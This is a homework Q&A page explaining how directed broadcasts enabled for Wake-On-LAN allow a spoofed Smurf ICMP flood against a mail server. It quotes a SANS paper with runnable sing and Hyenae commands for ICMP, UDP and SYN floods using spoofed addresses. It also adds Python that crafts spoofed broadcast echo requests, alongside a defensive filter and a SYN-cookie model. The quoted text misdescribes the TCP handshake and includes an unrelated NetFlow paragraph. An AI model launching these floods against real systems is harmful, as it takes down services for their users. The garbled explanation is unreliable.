
An attacker is able to get the IP address of the target organization’s mail server


Question

An attacker is able to get the IP address of the target organization’s mail server. From information leakage and social engineering, the attacker finds out that the company has Wake-On-LAN (WOL) implemented to save power as part of their green initiative. This lets you know that IP directed broadcasts are enabled.

If the attacker plans to spoof his address as the mail server, explain why this information might be beneficial to an attacker that plans on carrying out an ICMP Flood style Denial of Service attack.

Explanation / Answer

Types of attacks

There are several flavors of Denial of Service that could disrupt a normal service. The attacking methods are classified into two methods according to Erikson Jon [1].

- The first type would be to flood the network, not leaving enough bandwidth for the legitimate packets to get through. This could also be termed Flooding.
- The other method is to crash a hardware or software item and make it inoperable. Web servers, routing devices and DNS lookup servers are the common targets that could be crashed during an attack.

This project has investigated both scenarios and has analyzed their effects. The DDoS paper published by Lee Garber talks about the mechanisms involved in some common attack types. Following are the most basic attacking methods employed so far [2].

(©2011 The SANS Institute, as part of the Information Security Reading Room. Author retains full rights. subramanirao@yahoo.com)

3.1.1 Smurf attack: This attack works on the mechanism of flooding the victim's bandwidth. In this method the attacker sends a large number of ICMP echo requests to a broadcast address. All the ICMP messages have a spoofed source address, that of the victim's IP address. Eventually all the reply messages target and flood the victim's address.

3.1.2 Ping Flood and Ping of Death: Ping flood is similar to Smurf, wherein the victim is bombarded with thousands of ping packets. In Ping of Death, the victim is sent corrupt packets that could crash the system [3]. Smurf and ping floods are very easy to craft and any novice attacker could do it with ease. The following command in a Linux terminal could launch an attack [17].

    Attacker# ./sing -echo -s 1024 -S ddos-1.example.com 192.168.81.255
    Singing to 192.168.81.255 (192.168.81.255): 16 data bytes

There are enough effective defense mechanisms against Smurf and Ping attacks on the internet lately. However, these attacks could cause considerable damage in small Local Area Networks.

3.1.3 TCP SYN flood: The above described methods work on consuming bandwidth, whereas this attack aims at exploiting server CPU and memory. Whenever a host attempts to connect to a server, a three-way handshake is completed before any actual data transfer occurs. Firstly, the host sends a SYN packet to initiate the handshake. The server then replies with an Acknowledgement packet. At last the host again needs to send a SYN ACK packet to establish a successful connection. But attackers leave the handshake half open by not sending the last SYN ACK. Such a half-open state is stored in the server's memory and the server keeps waiting for the host to send the final packet. When thousands of such half-open connections are initiated, the server runs out of memory and crashes. It will not be able to serve the legitimate clients as its memory is filled with forged fake packets [5].

3.1.4 UDP flood: UDP flooding is similar to ping flood. Here, instead of ping packets, UDP packets are bombarded against the server. UDP could be a lot more effective than ICMP in smaller networks as the size of the UDP packets is enormous. The packet size could be set up to 65000 bytes, which could easily flood a given Ethernet network when multiple zombies are set up. This project has analyzed all the above described attacks and has brought out some interesting observations.

Strategies

The attack from the Hyenae packet generator could be initiated from the Linux terminal. The following commands decide what kind of attack is to be launched against the server. The characters and the keywords used for the various attacks are first explained below.

- ‘-p’ denotes that a packet size of 1000 bytes is to be generated by this command. The packet size can be adjusted according to the need, but the highest size is chosen here to do the maximum damage.
- The symbols ‘-s’ and ‘-d’ denote the source and destination addresses respectively.
- ‘-A’ denotes IP version 4. The attacks can also be performed with IP version 6 by changing ‘-A 4’ to ‘-A 6’.
- The percentage symbol in the command is used to aim at random ports when attacking. The attack could be made even more specific by changing it to port 80 instead of %%.

- The command below, when entered on the terminal, generates random UDP packets and targets them against the server's IP address. We also need to provide the MAC address of the server in order to launch this attack.

    UDP flood → hyenae -I 1 -a udp -p 1000 -A 4 -s 00:02:B3:94:9E:DF-192.168.2.2@%% -d 00:10:A7:0F:2F:04-192.168.1.2@%%

- The following command is employed to launch ICMP instead of UDP. It is exactly the same as the previous command but differs in the destination address.

    ICMP flooding → hyenae -I 1 -a icmp-echo -A 4 -s 00:02:B3:94:9E:DF-192.168.1.2 -d ff:ff:ff:ff:ff:ff-255.255.255.255

- This command invokes fake TCP connections and forces the server to hold all the half-open SYN connections. The server's CPU and memory try to hold as many connections as possible but eventually it crashes out of memory.

    SYN flooding → hyenae -I 1 -a tcp -f s -A 4 -s 00:02:B3:94:9E:DF-192.168.2.2@%% -d 00:10:A7:0F:2F:04-192.168.1.2@%%

The following table shows the list of parameters specified in the Hyenae tool for carrying out each attack.
    Attack  Payload size  IP version  Source MAC         Source IP    Destination MAC    Destination IP   Port
    UDP     1000          IPv4        00:02:B3:94:9E:DF  192.168.2.2  00:10:A7:0F:2F:04  192.168.1.2      Random
    ICMP    -             IPv4        00:02:B3:94:9E:DF  192.168.2.2  ff:ff:ff:ff:ff:ff  255.255.255.255  -
    TCP     -             IPv4        00:02:B3:94:9E:DF  192.168.2.2  00:10:A7:0F:2F:04  192.168.1.2      Random

Table: Attack specifications used in the Hyenae packet generator.

We can observe that nearly five thousand traffic pattern packets have been exported to the NetFlow collector. This information is always exported as UDP packets for many convenience reasons. A total of 779 UDP datagrams have been exported. But there is always a danger of losing UDP packets, as they are connectionless and do not guarantee Quality of Service. Hence Cisco came up with the idea of a ‘flow sequence number’ that is attached to the packets to make sure that they are not lost during network congestion.
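The question is really asking about Smurf amplification, and the Hyenae ICMP command above already shows the pattern: the source is the server's own address (192.168.1.2) and the destination is a broadcast. The WOL clue matters because magic packets that have to cross subnets are normally sent as subnet-directed broadcasts, so the organization's routers must forward directed broadcasts; a router that does that will also turn an external echo request addressed to, say, 192.168.81.255 into a link-layer broadcast, and every host on that segment answers the spoofed source, the mail server. The limited broadcast 255.255.255.255 used in the Hyenae command is never routed, so an outside attacker needs the directed form. The Python below is an added example, not code from the page or from the SANS paper it quotes: it builds the spoofed IPv4/ICMP echo request, derives the directed-broadcast address from a target prefix, estimates the reflection factor, and implements the edge-filter check that should drop such packets. The addresses, the IP identification value and the responder count are constructed for illustration.

```python
"""Smurf-style ICMP amplification through a directed broadcast.

Added example, not code from the page or from the SANS paper it quotes.
All addresses, identifiers and the responder count are constructed.
"""
import ipaddress
import struct

# Constructed scenario: the attacker spoofs the mail server as the source and aims at
# the directed-broadcast address of an internal subnet whose routers forward directed
# broadcasts (the same setting that lets WOL magic packets cross subnets).
MAIL_SERVER = "203.0.113.25"        # learned from the MX record; receives every reply
TARGET_LAN = "192.168.81.0/24"       # internal subnet learned by social engineering


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words; yields 0 when run over a
    header whose checksum field is already filled in, which is how we verify one."""
    if len(data) % 2:
        data += b"\x00"
    total = sum((data[i] << 8) | data[i + 1] for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def directed_broadcast(network: str) -> str:
    """192.168.81.0/24 -> 192.168.81.255. A router with directed-broadcast forwarding
    enabled turns a unicast-routed packet to this address into a link-layer broadcast."""
    return str(ipaddress.ip_network(network, strict=False).broadcast_address)


def build_icmp_echo_request(src: str, dst: str, ident: int, seq: int, payload: bytes) -> bytes:
    """Raw IPv4 + ICMP echo request with a forged source. Every host that answers the
    broadcast sends its echo reply to `src`, never to the attacker."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload      # type 8 = echo request
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x4242, 0, 64, 1, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    ip_hdr = ip_hdr[:10] + struct.pack("!H", inet_checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + icmp


def parse_ipv4(pkt: bytes) -> dict:
    """Decode the fields the checks below need from a raw IPv4 packet."""
    fields = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    proto = fields[6]
    return {
        "src": str(ipaddress.IPv4Address(fields[8])),
        "dst": str(ipaddress.IPv4Address(fields[9])),
        "proto": proto,
        "len": fields[2],
        "icmp_type": pkt[20] if proto == 1 and len(pkt) > 20 else None,
        "header_ok": inet_checksum(pkt[:20]) == 0,
    }


def amplification(pkt: bytes, responding_hosts: int) -> tuple[int, int]:
    """(bytes the attacker sends, bytes delivered to the spoofed source).
    Echo replies mirror the request, so each responder returns a same-sized packet."""
    return len(pkt), len(pkt) * responding_hosts


def is_inbound_broadcast_echo(pkt: bytes, local_networks: list[str]) -> bool:
    """Edge-filter check: an ICMP echo request arriving from outside and addressed to
    one of our subnets' directed-broadcast addresses has no legitimate use; drop and alert."""
    p = parse_ipv4(pkt)
    if p["proto"] != 1 or p["icmp_type"] != 8:
        return False
    return p["dst"] in {directed_broadcast(n) for n in local_networks}


if __name__ == "__main__":
    pkt = build_icmp_echo_request(MAIL_SERVER, directed_broadcast(TARGET_LAN), 0x1234, 1, b"A" * 56)
    sent, reflected = amplification(pkt, 250)      # 250 hosts answering the broadcast
    print(f"attacker sends {sent} B per request; mail server receives {reflected} B")
    print("edge filter would drop:", is_inbound_broadcast_echo(pkt, [TARGET_LAN]))
```

The two controls that break this are well known: routers should not forward directed broadcasts (on Cisco IOS `no ip directed-broadcast`, the default since IOS 12.0 as recommended by RFC 2644), and hosts should not answer broadcast pings (Linux `net.ipv4.icmp_echo_ignore_broadcasts = 1`, also the default). An organization that has re-enabled directed-broadcast forwarding for WOL has undone the first control and is relying entirely on the second plus the edge filter shown above.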

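The SYN flood section above describes half-open state filling the server's memory. The Python below is an added example, not code from the page or from the SANS paper it quotes, and both "servers" are simplified models rather than a TCP stack. It puts a stateful backlog listener next to a SYN-cookie listener: the first allocates an entry for every SYN (the handshake is SYN from the client, SYN-ACK from the server, ACK from the client; the spoofed sources never send the ACK, so the entries sit until they time out and legitimate SYNs are refused), while the second encodes an HMAC of the connection 4-tuple, the client's initial sequence number and a time counter into the SYN-ACK sequence number and validates the returning ACK with no stored state. The secret, addresses, ports and backlog size are constructed.

```python
"""SYN flood: a stateful backlog fills with half-open entries; a SYN-cookie listener
keeps no per-connection state and still completes legitimate handshakes.

Added example, not code from the page or the SANS paper it quotes; both listeners are
simplified models, not a TCP stack. Secret, addresses and ports are constructed.
"""
import hashlib
import hmac

SECRET = b"constructed-server-secret"           # random and rotated in a real stack
MSS_TABLE = (536, 1220, 1440, 1460)             # MSS values encodable in the cookie's MSS bits


class BacklogServer:
    """Stateful listener: SYN -> allocate half-open entry and send SYN-ACK; ACK -> establish.
    Spoofed SYNs never get their ACK, so their entries occupy the backlog until the timeout."""

    def __init__(self, backlog: int, syn_timeout: float = 60.0):
        self.backlog, self.syn_timeout = backlog, syn_timeout
        self.half_open: dict[tuple[str, int], float] = {}      # (ip, port) -> SYN-ACK time
        self.refused = 0

    def on_syn(self, ip: str, port: int, now: float):
        self.half_open = {k: t for k, t in self.half_open.items() if now - t <= self.syn_timeout}
        if len(self.half_open) >= self.backlog:
            self.refused += 1                                  # legitimate and spoofed alike
            return None
        self.half_open[(ip, port)] = now
        return "SYN-ACK"

    def on_ack(self, ip: str, port: int) -> bool:
        return self.half_open.pop((ip, port), None) is not None


class SynCookieServer:
    """Stateless listener: the SYN-ACK's initial sequence number is a cookie, an HMAC over
    the 4-tuple, the client ISN and a 64 s time counter. The client's ACK carries it back
    (ack = cookie + 1), so validation needs no memory of the SYN."""

    def __init__(self, secret: bytes, ip: str, port: int):
        self.secret, self.ip, self.port, self.established = secret, ip, port, 0

    def _cookie(self, ip: str, port: int, client_isn: int, t: int, mss_idx: int) -> int:
        msg = f"{ip}:{port}:{self.ip}:{self.port}:{client_isn}:{t}:{mss_idx}".encode()
        mac = int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:3], "big")
        return ((t & 0x1F) << 27) | (mss_idx << 24) | mac     # 5 bits time | 3 bits MSS | 24-bit MAC

    def on_syn(self, ip: str, port: int, client_isn: int, client_mss: int, now: float) -> int:
        mss_idx = max([i for i, m in enumerate(MSS_TABLE) if m <= client_mss], default=0)
        return self._cookie(ip, port, client_isn, int(now) // 64, mss_idx)   # nothing stored

    def on_ack(self, ip: str, port: int, ack: int, seq: int, now: float):
        """Returns the negotiated MSS if the cookie verifies, else None."""
        cookie, client_isn = (ack - 1) & 0xFFFFFFFF, (seq - 1) & 0xFFFFFFFF
        t_now = int(now) // 64
        mss_idx = min((cookie >> 24) & 0x7, len(MSS_TABLE) - 1)
        for t in (t_now, t_now - 1):                         # accept current or previous window
            if (t & 0x1F) == cookie >> 27 and self._cookie(ip, port, client_isn, t, mss_idx) == cookie:
                self.established += 1
                return MSS_TABLE[mss_idx]
        return None


def simulate_flood(kind: str, spoofed_syns: int, backlog: int = 128) -> bool:
    """Flood with SYNs from forged sources that never answer, then attempt one legitimate
    handshake from 203.0.113.7. Returns whether the legitimate client got connected."""
    now = 1_700_000_000.0
    if kind == "backlog":
        srv = BacklogServer(backlog)
        for i in range(spoofed_syns):
            srv.on_syn(f"198.51.100.{i % 254 + 1}", 1024 + i, now)
        if srv.on_syn("203.0.113.7", 40000, now + 1) is None:
            return False
        return srv.on_ack("203.0.113.7", 40000)
    srv = SynCookieServer(SECRET, "192.0.2.25", 25)
    for i in range(spoofed_syns):
        srv.on_syn(f"198.51.100.{i % 254 + 1}", 1024 + i, 1000 + i, 1460, now)
    isn = 777
    cookie = srv.on_syn("203.0.113.7", 40000, isn, 1460, now + 1)
    return srv.on_ack("203.0.113.7", 40000, (cookie + 1) & 0xFFFFFFFF, (isn + 1) & 0xFFFFFFFF, now + 1.1) is not None


if __name__ == "__main__":
    print("backlog server, 1000 spoofed SYNs, legit client connected:", simulate_flood("backlog", 1000))
    print("cookie server,  1000 spoofed SYNs, legit client connected:", simulate_flood("cookie", 1000))
```

The cost of the cookie approach is also visible in the model: only a few bits are available for options, so the server can only remember a coarse MSS and loses anything else the SYN carried, which is why real stacks (Linux `net.ipv4.tcp_syncookies`) switch cookies on only once the backlog is under pressure rather than for every connection.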